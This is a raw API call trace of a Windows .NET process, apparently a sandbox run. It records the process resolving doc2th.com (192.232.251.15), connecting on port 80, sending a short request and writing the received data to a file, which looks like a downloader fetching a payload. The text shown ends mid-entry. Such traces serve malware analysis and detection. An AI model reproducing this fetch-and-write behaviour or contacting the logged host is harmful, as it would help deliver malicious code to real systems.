0x0 [0054.949] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.949] GetLastError () returned 0x0 [0054.949] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252da04, cbSid=0x51ce914 | out: pSid=0x252da04*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce914) returned 1 [0054.949] GetLastError () returned 0x0 [0054.949] CreateMutexW (lpMutexAttributes=0x252db14, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0054.949] GetLastError () returned 0x5 [0054.950] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x41c [0054.950] GetLastError () returned 0x5 [0054.950] WaitForSingleObject (hHandle=0x41c, dwMilliseconds=0x1f4) returned 0x0 [0054.950] GetLastError () returned 0x5 [0054.950] ReleaseMutex (hMutex=0x41c) returned 1 [0054.950] GetLastError () returned 0x5 [0054.950] CloseHandle (hObject=0x41c) returned 1 [0054.950] GetLastError () returned 0x5 [0054.950] GetCurrentProcessId () returned 0xb44 [0054.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb44) returned 0x41c [0054.951] GetLastError () returned 0x5 [0054.952] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x51ce918, lpExitTime=0x51ce910, lpKernelTime=0x51ce910, lpUserTime=0x51ce910 | out: lpCreationTime=0x51ce918, lpExitTime=0x51ce910, lpKernelTime=0x51ce910, lpUserTime=0x51ce910) returned 1 [0054.952] GetLastError () returned 0x5 [0054.954] CloseHandle (hObject=0x41c) returned 1 [0054.954] GetLastError () returned 0x5 [0054.955] ReleaseMutex (hMutex=0x414) returned 1 [0054.955] GetLastError () returned 0x5 [0054.955] CloseHandle (hObject=0x414) returned 1 [0054.955] GetLastError () returned 0x5 [0054.955] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252e3f8, cbSid=0x51ce954 | out: pSid=0x252e3f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.955] GetLastError () returned 0x5 [0054.956] CreateMutexW (lpMutexAttributes=0x252e508, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.956] GetLastError () returned 0x0 [0054.956] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.956] GetLastError () returned 0x0 [0054.956] ReleaseMutex (hMutex=0x414) returned 1 [0054.956] GetLastError () returned 0x0 [0054.956] CloseHandle (hObject=0x414) returned 1 [0054.956] GetLastError () returned 0x0 [0054.956] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252ec7c, cbSid=0x51ce954 | out: pSid=0x252ec7c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.956] GetLastError () returned 0x0 [0054.957] CreateMutexW (lpMutexAttributes=0x252ed8c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.957] GetLastError () returned 0x0 [0054.957] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.957] GetLastError () returned 0x0 [0054.957] ReleaseMutex (hMutex=0x414) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CloseHandle (hObject=0x414) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252f504, cbSid=0x51ce954 | out: pSid=0x252f504*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.957] GetLastError () returned 0x0 [0054.957] CreateMutexW (lpMutexAttributes=0x252f614, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.957] GetLastError () returned 0x0 [0054.957] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.957] GetLastError () returned 0x0 [0054.958] ReleaseMutex (hMutex=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CloseHandle (hObject=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252fd84, cbSid=0x51ce954 | out: pSid=0x252fd84*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateMutexW (lpMutexAttributes=0x252fe94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.958] GetLastError () returned 0x0 [0054.958] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.958] GetLastError () returned 0x0 [0054.958] ReleaseMutex (hMutex=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CloseHandle (hObject=0x414) returned 1 [0054.958] GetLastError () returned 0x0 [0054.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2530600, cbSid=0x51ce94c | out: pSid=0x2530600*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CreateMutexW (lpMutexAttributes=0x2530710, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.959] GetLastError () returned 0x0 [0054.959] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.959] GetLastError () returned 0x0 [0054.959] ReleaseMutex (hMutex=0x414) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CloseHandle (hObject=0x414) returned 1 [0054.959] GetLastError () returned 0x0 [0054.959] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2530e88, cbSid=0x51ce94c | out: pSid=0x2530e88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.959] GetLastError () returned 0x0 [0054.960] CreateMutexW (lpMutexAttributes=0x2530f98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.960] GetLastError () returned 0x0 [0054.960] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.960] GetLastError () returned 0x0 [0054.960] ReleaseMutex (hMutex=0x414) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CloseHandle (hObject=0x414) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25316ec, cbSid=0x51ce94c | out: pSid=0x25316ec*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.960] GetLastError () returned 0x0 [0054.960] CreateMutexW (lpMutexAttributes=0x25317fc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.960] GetLastError () returned 0x0 [0054.960] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.960] GetLastError () returned 0x0 [0054.961] ReleaseMutex (hMutex=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CloseHandle (hObject=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2531f60, cbSid=0x51ce94c | out: pSid=0x2531f60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateMutexW (lpMutexAttributes=0x2532070, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.961] GetLastError () returned 0x0 [0054.961] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.961] GetLastError () returned 0x0 [0054.961] ReleaseMutex (hMutex=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CloseHandle (hObject=0x414) returned 1 [0054.961] GetLastError () returned 0x0 [0054.961] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25327cc, cbSid=0x51ce94c | out: pSid=0x25327cc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce94c) returned 1 [0054.962] GetLastError () returned 0x0 [0054.962] CreateMutexW (lpMutexAttributes=0x25328dc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.962] GetLastError () returned 0x0 [0054.962] WaitForSingleObject (hHandle=0x414, dwMilliseconds=0x1f4) returned 0x0 [0054.962] GetLastError () returned 0x0 [0054.962] ReleaseMutex (hMutex=0x414) returned 1 [0054.962] GetLastError () returned 0x0 [0054.962] CloseHandle (hObject=0x414) returned 1 [0054.962] GetLastError () returned 0x0 [0054.964] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414 [0054.964] GetLastError () returned 0x0 [0054.965] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0054.965] GetLastError () returned 0x0 [0054.966] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x51ceb98 | out: argp=0x51ceb98) returned 0 [0054.966] GetLastError () returned 0x0 [0054.967] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420 [0054.967] GetLastError () returned 0x0 [0054.967] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424 [0054.967] GetLastError () returned 0x0 [0054.967] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x51ceb98 | out: argp=0x51ceb98) returned 0 [0054.967] GetLastError () returned 0x0 [0054.968] WSAIoctl (in: s=0x414, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0) returned -1 [0054.968] GetLastError () returned 0x2733 [0054.968] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0054.980] GetLastError () returned 0x2733 [0054.981] WSAEventSelect (s=0x414, hEventObject=0x41c, lNetworkEvents=512) returned 0 [0054.981] GetLastError () returned 0x0 [0054.981] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ceb7c, lpOverlapped=0x0) returned -1 [0054.981] GetLastError () returned 0x2733 [0054.981] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0054.981] GetLastError () returned 0x2733 [0054.989] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0 [0054.989] GetLastError () returned 0x0 [0054.989] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428 [0054.989] GetLastError () returned 0x0 [0054.990] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x428, param_3=0x3) returned 0x0 [0054.994] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x51ceb60 | out: phkResult=0x51ceb60*=0x440) returned 0x0 [0054.994] GetLastError () returned 0x0 [0054.997] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x444) returned 0x0 [0054.997] GetLastError () returned 0x0 [0054.997] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448 [0054.997] GetLastError () returned 0x0 [0054.998] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0 [0054.998] GetLastError () returned 0x0 [0054.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x44c) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450 [0054.999] GetLastError () returned 0x0 [0054.999] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ceb1c | out: phkResult=0x51ceb1c*=0x454) returned 0x0 [0054.999] GetLastError () returned 0x0 [0054.999] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458 [0054.999] GetLastError () returned 0x0 [0054.999] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0 [0054.999] GetLastError () returned 0x0 [0055.000] GetCurrentProcess () returned 0xffffffff [0055.000] GetLastError () returned 0x3f0 [0055.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ceb04 | out: TokenHandle=0x51ceb04*=0x45c) returned 1 [0055.000] GetLastError () returned 0x3f0 [0055.003] GetCurrentProcess () returned 0xffffffff [0055.003] GetLastError () returned 0x3f0 [0055.003] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce720 | out: TokenHandle=0x51ce720*=0x460) returned 1 [0055.003] GetLastError () returned 0x3f0 [0055.005] GetCurrentProcess () returned 0xffffffff [0055.005] GetLastError () returned 0x3f0 [0055.005] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce730 | out: TokenHandle=0x51ce730*=0x464) returned 1 [0055.005] GetLastError () returned 0x3f0 [0055.025] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x3934f8 | out: pProxyConfig=0x3934f8) returned 1 [0055.053] GetLastError () returned 0x0 [0055.065] GetCurrentProcess () returned 0xffffffff [0055.065] GetLastError () returned 0x3f0 [0055.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce758 | out: TokenHandle=0x51ce758*=0x4b4) returned 1 [0055.065] GetLastError () returned 0x3f0 [0055.065] GetCurrentProcess () returned 0xffffffff [0055.065] GetLastError () returned 0x3f0 [0055.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce768 | out: TokenHandle=0x51ce768*=0x4b8) returned 1 [0055.065] GetLastError () returned 0x3f0 [0055.066] SetEvent (hEvent=0x3a8) returned 1 [0055.066] GetLastError () returned 0x3f0 [0055.076] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x51ceab8 | out: pFixedInfo=0x0, pOutBufLen=0x51ceab8) returned 0x6f [0055.089] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x51d2828 [0055.089] GetLastError () returned 0x0 [0055.089] GetNetworkParams (in: pFixedInfo=0x51d2828, pOutBufLen=0x51ceab8 | out: pFixedInfo=0x51d2828, pOutBufLen=0x51ceab8) returned 0x0 [0055.098] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0055.098] GetLastError () returned 0x0 [0055.103] LocalFree (hMem=0x51d2828) returned 0x0 [0055.103] GetLastError () returned 0x0 [0055.106] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc [0055.106] GetLastError () returned 0x0 [0055.107] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8 [0055.107] GetLastError () returned 0x0 [0055.110] getaddrinfo (in: pNodeName="doc2th.com", pServiceName=0x0, pHints=0x51ce994*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x51ce728 | out: ppResult=0x51ce728*=0x3bc4b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="doc2th.com", ai_addr=0x3bbd70*(sa_family=2, sin_port=0x0, sin_addr="192.232.251.15"), ai_next=0x0)) returned 0 [0055.116] GetLastError () returned 0x0 [0055.117] FreeAddrInfoW (pAddrInfo=0x3bc4b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="潤㉣桴挮浯", ai_addr=0x3bbd70*(sa_family=2, sin_port=0x0, sin_addr="192.232.251.15"), ai_next=0x0)) [0055.117] GetLastError () returned 0x0 [0055.118] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0055.118] GetLastError () returned 0x0 [0055.118] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4 [0055.118] GetLastError () returned 0x0 [0055.118] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x51ce978 | out: argp=0x51ce978) returned 0 [0055.118] GetLastError () returned 0x0 [0055.118] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4 [0055.118] GetLastError () returned 0x0 [0055.119] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8 [0055.119] GetLastError () returned 0x0 [0055.119] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x51ce978 | out: argp=0x51ce978) returned 0 [0055.119] GetLastError () returned 0x0 [0055.119] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0) returned -1 [0055.119] GetLastError () returned 0x2733 [0055.119] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0055.119] GetLastError () returned 0x2733 [0055.119] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0 [0055.119] GetLastError () returned 0x0 [0055.119] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x51ce95c, lpOverlapped=0x0) returned -1 [0055.119] GetLastError () returned 0x2733 [0055.119] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0055.119] GetLastError () returned 0x2733 [0055.119] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0 [0055.119] GetLastError () returned 0x0 [0055.122] GetAdaptersAddresses () returned 0x6f [0055.125] LocalAlloc (uFlags=0x0, uBytes=0xa44) returned 0x51d6cb0 [0055.126] GetLastError () returned 0x0 [0055.126] GetAdaptersAddresses () returned 0x0 [0055.129] LocalFree (hMem=0x51d6cb0) returned 0x0 [0055.130] GetLastError () returned 0x0 [0055.138] WSAConnect (in: s=0x4cc, name=0x253a114*(sa_family=2, sin_port=0x50, sin_addr="192.232.251.15"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0055.325] GetLastError () returned 0x0 [0055.326] closesocket (s=0x4c8) returned 0 [0055.326] GetLastError () returned 0x0 [0055.329] send (in: s=0x4cc, buf=0x253b9e0*, len=71, flags=0 | out: buf=0x253b9e0*) returned 71 [0055.329] GetLastError () returned 0x0 [0055.331] setsockopt (s=0x4cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0055.331] GetLastError () returned 0x0 [0055.331] recv (in: s=0x4cc, buf=0x25372c8, len=4096, flags=0 | out: buf=0x25372c8*) returned 4096 [0055.522] GetLastError () returned 0x0 [0055.525] setsockopt (s=0x4cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0055.525] GetLastError () returned 0x0 [0055.525] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 8972 [0055.526] GetLastError () returned 0x0 [0055.526] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.527] GetLastError () returned 0x0 [0055.527] WriteFile (in: hFile=0x388, lpBuffer=0x253d972*, nNumberOfBytesToWrite=0x2222, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d972*, lpNumberOfBytesWritten=0x51cec40*=0x2222, lpOverlapped=0x0) returned 1 [0055.527] GetLastError () returned 0x0 [0055.528] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 3752 [0055.710] GetLastError () returned 0x0 [0055.710] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 3508 [0055.710] GetLastError () returned 0x0 [0055.710] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.711] GetLastError () returned 0x0 [0055.711] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 23232 [0055.901] GetLastError () returned 0x0 [0055.901] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.901] GetLastError () returned 0x0 [0055.901] WriteFile (in: hFile=0x388, lpBuffer=0x253dc2c*, nNumberOfBytesToWrite=0x571c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253dc2c*, lpNumberOfBytesWritten=0x51cec40*=0x571c, lpOverlapped=0x0) returned 1 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 7260 [0055.902] GetLastError () returned 0x0 [0055.902] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x1c5c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1c5c, lpOverlapped=0x0) returned 1 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.903] GetLastError () returned 0x0 [0055.903] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 2904 [0055.903] GetLastError () returned 0x0 [0055.903] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.903] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.904] GetLastError () returned 0x0 [0055.904] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0055.904] GetLastError () returned 0x0 [0055.904] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.904] GetLastError () returned 0x0 [0055.904] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.904] GetLastError () returned 0x0 [0055.904] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.904] GetLastError () returned 0x0 [0055.905] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 20328 [0056.091] GetLastError () returned 0x0 [0056.091] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] WriteFile (in: hFile=0x388, lpBuffer=0x253e57c*, nNumberOfBytesToWrite=0x4274, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253e57c*, lpNumberOfBytesWritten=0x51cec40*=0x4274, lpOverlapped=0x0) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 5808 [0056.092] GetLastError () returned 0x0 [0056.092] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x16b0, lpOverlapped=0x0) returned 1 [0056.093] GetLastError () returned 0x0 [0056.093] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0056.093] GetLastError () returned 0x0 [0056.093] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.093] GetLastError () returned 0x0 [0056.093] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.094] GetLastError () returned 0x0 [0056.094] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 17424 [0056.276] GetLastError () returned 0x0 [0056.276] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, 